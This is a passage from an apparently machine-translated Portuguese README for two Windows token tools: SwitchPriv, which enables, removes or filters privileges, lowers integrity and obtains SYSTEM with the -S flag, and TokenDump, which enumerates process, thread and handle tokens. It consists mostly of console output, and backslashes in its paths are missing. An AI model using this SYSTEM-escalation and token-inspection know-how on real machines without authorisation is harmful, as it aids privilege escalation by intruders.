[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 4 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
Se você deseja testar um privilégio específico, poderá remover todos os privilégios além de querer testar com a opção -f da seguinte maneira:
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 4392
[*] Process Name : powershell
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -f tim
[>] Trying to remove all token privileges except one.
[*] Target PID : 4392
[*] Process Name : powershell
[>] Trying to remove all privileges except for SeTimeZonePrivilege.
[+] SeShutdownPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 4392
[*] Process Name : powershell
[+] Got 1 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
=================== =======
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
Você pode usar o valor separado de vírgula para filtrar vários privilégios da seguinte maneira:
PS C:Dev> .SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 24 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
[*] Integrity Level : High Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 24300 -f rest,back,deb
[>] Trying to remove all token privileges except one.
[*] Target PID : 24300
[*] Process Name : powershell
[>] Trying to remove privileges other than follows.
[*] SeBackupPrivilege
[*] SeRestorePrivilege
[*] SeDebugPrivilege
[+] SeIncreaseQuotaPrivilege is removed successfully.
[+] SeSecurityPrivilege is removed successfully.
[+] SeTakeOwnershipPrivilege is removed successfully.
[+] SeLoadDriverPrivilege is removed successfully.
[+] SeSystemProfilePrivilege is removed successfully.
[+] SeSystemtimePrivilege is removed successfully.
[+] SeProfileSingleProcessPrivilege is removed successfully.
[+] SeIncreaseBasePriorityPrivilege is removed successfully.
[+] SeCreatePagefilePrivilege is removed successfully.
[+] SeShutdownPrivilege is removed successfully.
[+] SeSystemEnvironmentPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeRemoteShutdownPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeManageVolumePrivilege is removed successfully.
[+] SeImpersonatePrivilege is removed successfully.
[+] SeCreateGlobalPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[+] SeTimeZonePrivilege is removed successfully.
[+] SeCreateSymbolicLinkPrivilege is removed successfully.
[+] SeDelegateSessionUserImpersonatePrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 3 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================= ========
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeDebugPrivilege Enabled
[*] Integrity Level : High Mandatory Level
[*] Done.
Para habilitar, desativar ou remover todos os privilégios de token disponíveis, especifique all como o valor para -opção --enable --disable ou --remove :
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:Dev> .SwitchPriv.exe -e all
[>] Trying to enable all token privileges.
[*] Target PID : 6772
[*] Process Name : powershell
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Para encontrar o processo, tenha um privilégio específico, use -s da seguinte forma:
PS C:Dev> .SwitchPriv.exe -s createt
[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
[*] Memory Compression (PID : 2548)
[*] smss (PID : 372)
[*] lsass (PID : 736)
[*] csrss (PID : 584)
[*] csrss (PID : 504)
[*] Access is denied by following 2 process(es).
[*] System (PID : 4)
[*] Idle (PID : 0)
[*] Done.
PS C:Dev> .SwitchPriv.exe -g -p 2548
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
Se você deseja definir o nível de integridade, use -opção --integrity da seguinte forma:
PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelMedium Mandatory Level Label S-1-16-8192
PS C:Dev> .SwitchPriv.exe -i 1
[>] Trying to update Integrity Level.
[*] Target PID : 3436
[*] Process Name : powershell
[>] Trying to update Integrity Level to LOW_MANDATORY_LEVEL.
[+] Integrity Level is updated successfully.
[*] Done.
PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelLow Mandatory Level Label S-1-16-4096
Para executar qualquer ação como sistema, Set -S Flag da seguinte forma ( SeDebugPrivilege e SeImpersonatePrivilege são necessários):
PS C:Dev> .SwitchPriv.exe -g -p 2548 -S
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
De volta ao topo
Projeto
Esta ferramenta é um utilitário para inspecionar informações de token:
C:Dev>.TokenDump.exe -h
TokenDump - Tool to dump processs token information.
Usage: TokenDump.exe [Options]
-h, --help : Displays this help message.
-d, --debug : Flag to enable SeDebugPrivilege.
-e, --enum : Flag to enumerate brief information tokens for processes or handles.
-T, --thread : Flag to scan thead tokens. Use with -e option.
-H, --handle : Flag to scan token handles. Use with -e option.
-s, --scan : Flag to get verbose information for a specific process, thread or handle.
-a, --account : Specifies account name filter string. Use with -e flag.
-p, --pid : Specifies a target PID in decimal format. Use with -s flag, or -e and -H flag.
-t, --tid : Specifies a target TID in decimal format. Use with -s flag and -p option.
-v, --value : Specifies a token handle value in hex format. Use with -s flag and -p option.
Para enumerar o token para todos os processos, basta definir -e sinalizador:
C:Dev>.TokenDump.exe -e
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITYSYSTEM System False False
3728 0 conhost.exe NT AUTHORITYSYSTEM System False False
--snip--
6712 0 svchost.exe NT AUTHORITYLOCAL SERVICE System False False
1972 0 svchost.exe NT AUTHORITYSYSTEM System False False
[+] Got 129 token information.
[*] Found 7 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYNETWORK SERVICE
[*] Font Driver HostUMFD-0
[*] Font Driver HostUMFD-1
[*] Window ManagerDWM-1
[*] Done.
Se você deseja ativar o Sedebugprivilege, defina -d Flag da seguinte forma:
C:Dev>.TokenDump.exe -e -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITYSYSTEM System False False
3728 0 conhost.exe NT AUTHORITYSYSTEM System False False
3740 0 vm3dservice.exe NT AUTHORITYSYSTEM System False False
--snip--
Quando definido -H sinaliza com -e sinalizador, o Tokendump tenta enumerar informações de lida com o token:
C:Dev>.TokenDump.exe -e -H -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x38C 1 dev22h2user Medium False False Primary Impersonation
--snip--
[Token Handle(s) - svchost.exe (PID: 3272)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ========================== ========= ========== ============ ========== ===================
0x168 0 NT AUTHORITYLOCAL SERVICE System False False Primary Anonymous
[+] Got 819 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Font Driver HostUMFD-1
[*] Font Driver HostUMFD-0
[*] NT AUTHORITYNETWORK SERVICE
[*] Window ManagerDWM-1
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYANONYMOUS LOGON
[*] Done.
Quando especificado PID com a opção -p , o Tokendup enumera apenas as alças do processo especificado:
C:Dev>.TokenDump.exe -e -H -d -p 704
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x38C 1 dev22h2user Medium False False Primary Impersonation
0x398 1 dev22h2user High False False Primary Identification
0x3C4 1 dev22h2user Medium False False Impersonation Impersonation
0x3C8 1 dev22h2user Medium False False Impersonation Impersonation
0x3D0 1 dev22h2user Medium False False Impersonation Impersonation
0x3D4 1 dev22h2user Medium False False Impersonation Impersonation
[+] Got 8 handle(s).
[*] Found 2 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Done.
Para enumerar o token de thread personificado, defina -T sinalizador e -sinalizador -e da seguinte forma:
C:Dev>.TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
1952 2300 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITYSYSTEM
[*] Done.
Se você deseja filtrar esses resultados com o nome de usuário do token, defina a sequência do filtro como -a de opção como segue:
C:Dev>.TokenDump.exe -e -a network -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= ============ ============================ ========= ========== ============
1932 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
3500 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
2904 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
2504 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
7012 0 msdtc.exe NT AUTHORITYNETWORK SERVICE System False False
7092 0 sppsvc.exe NT AUTHORITYNETWORK SERVICE System False False
1676 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
3584 0 WmiPrvSE.exe NT AUTHORITYNETWORK SERVICE System False False
1000 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
[+] Got 9 token information.
[*] Found 7 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYNETWORK SERVICE
[*] Font Driver HostUMFD-0
[*] Font Driver HostUMFD-1
[*] Window ManagerDWM-1
[*] Done.
C:Dev>.TokenDump.exe -e -a network -d -H
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - lsass.exe (PID: 768)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ============= ===================
0x914 0 NT AUTHORITYNETWORK SERVICE System False False Impersonation Impersonation
--snip--
[Token Handle(s) - msdtc.exe (PID: 7012)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ========== ===================
0x23C 0 NT AUTHORITYNETWORK SERVICE System False False Primary Anonymous
[+] Got 27 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Font Driver HostUMFD-1
[*] Font Driver HostUMFD-0
[*] NT AUTHORITYNETWORK SERVICE
[*] Window ManagerDWM-1
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYANONYMOUS LOGON
[*] Done.
Para obter informações detalhadas para um processo específico, defina -s sinalizador e alvo PID como -p Valor da opção:
C:Dev>.TokenDump.exe -s -p 5996
[>] Trying to dump process token information.
[Token Information for StartMenuExperienceHost.exe (PID: 5996)]
ImageFilePath : C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe
CommandLine : "C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Token User : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Primary Group : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x0000000000063D9A
Authentication ID : 0x000000000001DFE5
Original ID : 0x00000000000003E7
Modified ID : 0x0000000000063D24
Integrity Level : Low
Protection Level : N/A
Session ID : 1
Elevation Type : Limited
Mandatory Policy : NoWriteUp
Elevated : False
AppContainer : True
TokenFlags : VirtualizeAllowed, IsFiltered, LowBox
AppContainer Name : microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy
AppContainer SID : S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000
AppContainer Number : 2
Has Linked Token : True
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account and member of Administrators group UseForDenyOnly
BUILTINAdministrators UseForDenyOnly
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYINTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITYNTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory LabelLow Mandatory Level Integrity, IntegrityEnabled
APPCONTAINER CAPABILITIES
-------------------------
Capability Name Flags
========================================================================== =======
APPLICATION PACKAGE AUTHORITYYour Internet connection Enabled
APPLICATION PACKAGE AUTHORITYYour home or work networks Enabled
NAMED CAPABILITIESPackageQuery Enabled
NAMED CAPABILITIESActivitySystem Enabled
NAMED CAPABILITIESPreviewStore Enabled
NAMED CAPABILITIESCortanaPermissions Enabled
NAMED CAPABILITIESAppointmentsSystem Enabled
NAMED CAPABILITIESTeamEditionExperience Enabled
NAMED CAPABILITIESShellExperience Enabled
NAMED CAPABILITIESPackageContents Enabled
NAMED CAPABILITIESVisualElementsSystem Enabled
NAMED CAPABILITIESUserAccountInformation Enabled
NAMED CAPABILITIESActivityData Enabled
NAMED CAPABILITIESCloudStore Enabled
NAMED CAPABILITIESTargetedContent Enabled
NAMED CAPABILITIESStoreAppInstall Enabled
NAMED CAPABILITIESStoreLicenseManagement Enabled
NAMED CAPABILITIESCortanaSettings Enabled
NAMED CAPABILITIESDependencyTarget Enabled
NAMED CAPABILITIESSearchSettings Enabled
NAMED CAPABILITIESCellularData Enabled
NAMED CAPABILITIESWifiData Enabled
PACKAGE CAPABILITYmicrosoft.windows.startmenuexperiencehost_cw5n1h2txyewy Enabled
NAMED CAPABILITIESAccessoryManager Enabled
NAMED CAPABILITIESUserAccountInformation Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
======================================================= =========================== ===== =============
dev22h2user GenericAll None AccessAllowed
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
NT AUTHORITYLogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[Linked Token Information for StartMenuExperienceHost.exe (PID: 5996)]
Token User : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : BUILTINAdministrators (SID: S-1-5-32-544)
Primary Group : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Impersonation
Impersonation Level : Identification
Token ID : 0x000000000016ECE6
Authentication ID : 0x000000000001DF83
Original ID : 0x00000000000003E7
Modified ID : 0x000000000001DFE4
Integrity Level : High
Protection Level : N/A
Session ID : 1
Elevation Type : Full
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : NotLow
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account and member of Administrators group Mandatory, EnabledByDefault, Enabled
BUILTINAdministrators Mandatory, EnabledByDefault, Enabled, Owner
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYINTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITYNTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory LabelHigh Mandatory Level Integrity, IntegrityEnabled
DACL INFORMATION
----------------
Account Name Access Flags Type
==================================== =========================== ===== =============
BUILTINAdministrators GenericAll None AccessAllowed
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
NT AUTHORITYLogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[*] Done.
Se você definir o valor do manuseio em um processo específico como opção -v e a opção PID AS -p , bem como -s , essa ferramenta obtém informações detalhadas para o identificador da seguinte forma:
C:Dev>.TokenDump.exe -s -p 7012 -v 0x23C -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.
[Token Information for Handle 0x23C of msdtc.exe (PID: 7012)]
Token User : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Owner : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Primary Group : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x000000000007DF17
Authentication ID : 0x00000000000003E4
Original ID : 0x00000000000003E7
Modified ID : 0x000000000007DEE2
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : False
AppContainer : False
TokenFlags : IsFiltered, NotLow
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYSERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT SERVICEMSDTC EnabledByDefault, Enabled, Owner
NT AUTHORITYLogonSessionId_0_515780 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
=================== =========== ===== =============
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICEMSDTC GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000070
Value[0x01] : 0x000000000007DF18
[*] Done.
Para investigar o token seriptoado aplicado ao thread, defina o ID do thread como -t da seguinte forma:
C:Dev>.TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
1952 2300 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITYSYSTEM
[*] Done.
C:Dev>.TokenDump.exe -s -p 3516 -t 4656 -d
[>] Trying to enable SeDebugPrivilege.
